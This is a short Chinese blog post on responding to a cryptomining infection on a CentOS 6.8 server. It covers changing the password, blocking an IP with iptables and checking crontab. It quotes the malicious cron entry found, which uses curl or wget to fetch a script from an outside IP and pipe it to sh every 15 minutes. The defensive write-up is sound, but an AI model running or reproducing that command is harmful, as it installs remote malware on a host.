centos6.8服务器中了挖矿程序病毒的解决方法

在收到阿里云的安全警告2条

1、异常登录-ECS在非常用地登录

2、恶意进程(云查杀)-挖矿程序

根据提示分析,当有异常登录时,基本上是服务器的密码被破解了,所以第一步是先修改服务器的密码

输入命令passwd 回车输入新的密码

第二步、查封可疑IP,根据阿里云的提示使用iptabes禁止可疑IP的连接

iptables -I INPUT -s 68.183.140.39 -j DROP

查看一下是否增加进去了

iptables -L -n -v

第三步、查杀对应的病毒,大部分的病毒无非通过crontab和常驻内存进行复制;所以我们先去查一下crontab

扫描二维码关注公众号,回复: 10189407 查看本文章

输入命令crontab -e看一下是否有可疑的命令,我的查找到如下的命令

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

发布了108 篇原创文章 · 获赞 10 · 访问量 20万+

猜你喜欢

转载自blog.csdn.net/emtit2008/article/details/100536077